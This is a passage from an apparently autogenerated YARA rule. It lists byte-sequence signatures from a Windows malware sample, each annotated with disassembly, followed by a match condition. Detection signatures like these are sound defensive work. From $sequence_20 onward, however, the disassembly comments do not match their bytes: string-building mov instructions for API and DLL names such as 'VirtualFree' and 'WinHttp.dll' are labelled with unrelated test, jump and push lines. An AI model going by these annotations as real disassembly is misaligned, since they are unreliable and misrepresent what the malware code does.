            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_1 = { 742c 803e00 7427 6a3b 56 ff15???????? }
            // n = 6, score = 1300
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_2 = { 7411 40 50 6a08 ff15???????? }
            // n = 5, score = 1300
            //   7411                 | je                  0x13
            //   40                   | inc                 eax
            //   50                   | push                eax
            //   6a08                 | push                8
            //   ff15????????         |                     

        $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7420                 | je                  0x22
            //   837c241000           | cmp                 dword ptr [esp + 0x10], 0
            //   7419                 | je                  0x1b

        $sequence_4 = { 50 6801000080 ff15???????? eb13 }
            // n = 4, score = 1300
            //   50                   | push                eax
            //   6801000080           | push                0x80000001
            //   ff15????????         |                     
            //   eb13                 | jmp                 0x15

        $sequence_5 = { f7d0 d1c8 2d20010000 d1c0 f7d0 2d01910000 }
            // n = 6, score = 1300
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax
            //   2d01910000           | sub                 eax, 0x9101

        $sequence_6 = { be01000080 50 56 ff15???????? }
            // n = 4, score = 1300
            //   be01000080           | mov                 esi, 0x80000001
            //   50                   | push                eax
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 }
            // n = 6, score = 1300
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8906                 | mov                 dword ptr [esi], eax

        $sequence_8 = { 7511 56 57 ff15???????? 50 }
            // n = 5, score = 1300
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi
            //   ff15????????         |                     
            //   50                   | push                eax

        $sequence_9 = { c1c90d 0fbec0 03c8 46 8a06 84c0 75f1 }
            // n = 7, score = 1200
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi
            //   8a06                 | mov                 al, byte ptr [esi]
            //   84c0                 | test                al, al
            //   75f1                 | jne                 0xfffffff3

        $sequence_10 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, dword ptr [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_11 = { 8be5 5d c3 8b542404 33c9 }
            // n = 5, score = 1000
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx

        $sequence_12 = { 8d4508 50 0fb6440b34 50 }
            // n = 4, score = 800
            //   8d4508               | lea                 eax, dword ptr [ebp + 8]
            //   50                   | push                eax
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax

        $sequence_13 = { 51 51 8b4c240c 53 55 }
            // n = 5, score = 800
            //   51                   | push                ecx
            //   51                   | push                ecx
            //   8b4c240c             | mov                 ecx, dword ptr [esp + 0xc]
            //   53                   | push                ebx
            //   55                   | push                ebp

        $sequence_14 = { 89542414 8b12 85d2 7454 }
            // n = 4, score = 800
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56

        $sequence_15 = { eb5c 8d5004 89542414 8b12 }
            // n = 4, score = 800
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, dword ptr [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]

        $sequence_16 = { 8a4173 a808 75f5 a804 7406 }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_17 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_18 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax

        $sequence_19 = { 44 8d4904 ff15???????? 33ff }
            // n = 4, score = 300
            //   44                   | inc                 esp
            //   8d4904               | lea                 ecx, dword ptr [ecx + 4]
            //   ff15????????         |                     
            //   33ff                 | xor                 edi, edi

        $sequence_20 = { c7854005000047657450 c78544050000726f6365 c7854805000073734865 66c7854c0500006170 }
            // n = 4, score = 300
            //   c7854005000047657450     | test    eax, eax
            //   c78544050000726f6365     | je    0x14
            //   c7854805000073734865     | mov    eax, dword ptr [ebp + 0x50]
            //   66c7854c0500006170     | test    eax, eax

        $sequence_21 = { 85c0 7412 8b4550 85c0 740b }
            // n = 5, score = 300
            //   85c0                 | not                 eax
            //   7412                 | ror                 eax, 1
            //   8b4550               | sub                 eax, 0x120
            //   85c0                 | rol                 eax, 1
            //   740b                 | not                 eax

        $sequence_22 = { ff15???????? 85c0 7473 8b4550 }
            // n = 4, score = 300
            //   ff15????????         |                     
            //   85c0                 | je                  0x13
            //   7473                 | inc                 eax
            //   8b4550               | push                eax

        $sequence_23 = { c7853401000050726f63 c7853801000065737300 c785300300006b65726e c78534030000656c3332 }
            // n = 4, score = 300
            //   c7853401000050726f63     | push    8
            //   c7853801000065737300     | push    0
            //   c785300300006b65726e     | xor    eax, eax
            //   c78534030000656c3332     | inc    eax

        $sequence_24 = { c7859001000056697274 c7859401000075616c46 c7859801000072656500 c785b00400006b65726e }
            // n = 4, score = 300
            //   c7859001000056697274     | not    eax
            //   c7859401000075616c46     | ror    eax, 1
            //   c7859801000072656500     | sub    eax, 0x120
            //   c785b00400006b65726e     | rol    eax, 1

        $sequence_25 = { 0f94c7 8bc7 eb02 33c0 48 }
            // n = 5, score = 300
            //   0f94c7               | sete                bh
            //   8bc7                 | mov                 eax, edi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax
            //   48                   | dec                 eax

        $sequence_26 = { c785a807000053747243 c785ac07000068724100 c7858001000053686c77 c785840100006170692e c78588010000646c6c00 e8???????? }
            // n = 6, score = 300
            //   c785a807000053747243     | je    0x14
            //   c785ac07000068724100     | mov    dword ptr [ebp + 0x190], 0x74726956
            //   c7858001000053686c77     | mov    dword ptr [ebp + 0x194], 0x466c6175
            //   c785840100006170692e     | mov    dword ptr [ebp + 0x198], 0x656572
            //   c78588010000646c6c00     | mov    dword ptr [ebp + 0x4b0], 0x6e72656b
            //   e8????????           |                     

        $sequence_27 = { 7414 ff15???????? 4c 8bc3 33d2 48 8bc8 }
            // n = 7, score = 300
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc3                 | mov                 eax, ebx
            //   33d2                 | xor                 edx, edx
            //   48                   | dec                 eax
            //   8bc8                 | mov                 ecx, eax

        $sequence_28 = { 48 85ff 7414 ff15???????? 4c 8bc7 33d2 }
            // n = 7, score = 300
            //   48                   | dec                 eax
            //   85ff                 | test                edi, edi
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc7                 | mov                 eax, edi
            //   33d2                 | xor                 edx, edx

        $sequence_29 = { c785e404000070656e4b c785e804000065794578 66c785ec0400004100 c785900400006b65726e c78594040000656c3332 }
            // n = 5, score = 300
            //   c785e404000070656e4b     | push    eax
            //   c785e804000065794578     | mov    esi, edi
            //   66c785ec0400004100     | mov    eax, esi
            //   c785900400006b65726e     | jmp    8
            //   c78594040000656c3332     | test    eax, eax

        $sequence_30 = { c785e805000065727300 c785f000000057696e68 c785f40000007474702e c785f8000000646c6c00 e8???????? 660f6f05???????? }
            // n = 6, score = 300
            //   c785e805000065727300     | jne    0x13
            //   c785f000000057696e68     | push    esi
            //   c785f40000007474702e     | push    edi
            //   c785f8000000646c6c00     | test    eax, eax
            //   e8????????           |                     
            //   660f6f05????????     |                     

        $sequence_31 = { 33c0 4c 8d9c24a0000000 49 8b5b20 49 }
            // n = 6, score = 300
            //   33c0                 | xor                 eax, eax
            //   4c                   | dec                 esp
            //   8d9c24a0000000       | lea                 ebx, dword ptr [esp + 0xa0]
            //   49                   | dec                 ecx
            //   8b5b20               | mov                 ebx, dword ptr [ebx + 0x20]
            //   49                   | dec                 ecx

        $sequence_32 = { 837a1000 488bf1 0f8499000000 8b5a10 4803d9 837b0c00 0f8489000000 }
            // n = 7, score = 100
            //   837a1000             | xor                 eax, eax
            //   488bf1               | cmp                 dword ptr [edx + 0x10], 0
            //   0f8499000000         | dec                 eax
            //   8b5a10               | mov                 esi, ecx
            //   4803d9               | je                  0x9f
            //   837b0c00             | mov                 ebx, dword ptr [edx + 0x10]
            //   0f8489000000         | dec                 eax

        $sequence_33 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 }
            // n = 6, score = 100
            //   33d2                 | dec                 eax
            //   488bc8               | lea                 edx, dword ptr [ebp + 0x290]
            //   ff15????????         |                     
            //   488bb590020000       | dec                 eax
            //   4885f6               | lea                 ecx, dword ptr [ebp + 0x56]
            //   7414                 | test                eax, eax

        $sequence_34 = { 4c8b742420 eba1 488bb590020000 488b7c2438 }
            // n = 4, score = 100
            //   4c8b742420           | jne                 0xd
            //   eba1                 | xor                 edx, edx
            //   488bb590020000       | dec                 eax
            //   488b7c2438           | mov                 ecx, eax

        $sequence_35 = { 4883c314 e9???????? ff15???????? 33c0 }
            // n = 4, score = 100
            //   4883c314             | dec                 eax
            //   e9????????           |                     
            //   ff15????????         |                     
            //   33c0                 | add                 ebx, 0x14

        $sequence_36 = { ff15???????? 80bb8000000040 0f8577ffffff 488d8b81000000 488d542450 e8???????? }
            // n = 6, score = 100
            //   ff15????????         |                     
            //   80bb8000000040       | jmp                 0xffffffa8
            //   0f8577ffffff         | dec                 eax
            //   488d8b81000000       | mov                 esi, dword ptr [ebp + 0x290]
            //   488d542450           | dec                 eax
            //   e8????????           |                     

        $sequence_37 = { 4c8d8598020000 488d9590020000 488d4d56 e8???????? 85c0 750b ff15???????? }
            // n = 7, score = 100
            //   4c8d8598020000       | add                 ebx, ecx
            //   488d9590020000       | cmp                 dword ptr [ebx + 0xc], 0
            //   488d4d56             | je                  0x8f
            //   e8????????           |                     
            //   85c0                 | dec                 esp
            //   750b                 | lea                 eax, dword ptr [ebp + 0x298]
            //   ff15????????         |                     

        $sequence_38 = { 8364242000 4533c9 33d2 33c9 ff15???????? eb0b }
            // n = 6, score = 100
            //   8364242000           | jmp                 0xffffffa3
            //   4533c9               | dec                 eax
            //   33d2                 | mov                 esi, dword ptr [ebp + 0x290]
            //   33c9                 | dec                 eax
            //   ff15????????         |                     
            //   eb0b                 | mov                 edi, dword ptr [esp + 0x38]

        $sequence_39 = { ff15???????? 488d5702 488bce ff15???????? ba22000000 }
            // n = 5, score = 100
            //   ff15????????         |                     
            //   488d5702             | mov                 edi, dword ptr [esp + 0x38]
            //   488bce               | dec                 esp
            //   ff15????????         |                     
            //   ba22000000           | mov                 esi, dword ptr [esp + 0x20]

    condition:
        7 of them and filesize < 303104
}
Download all Yara Rules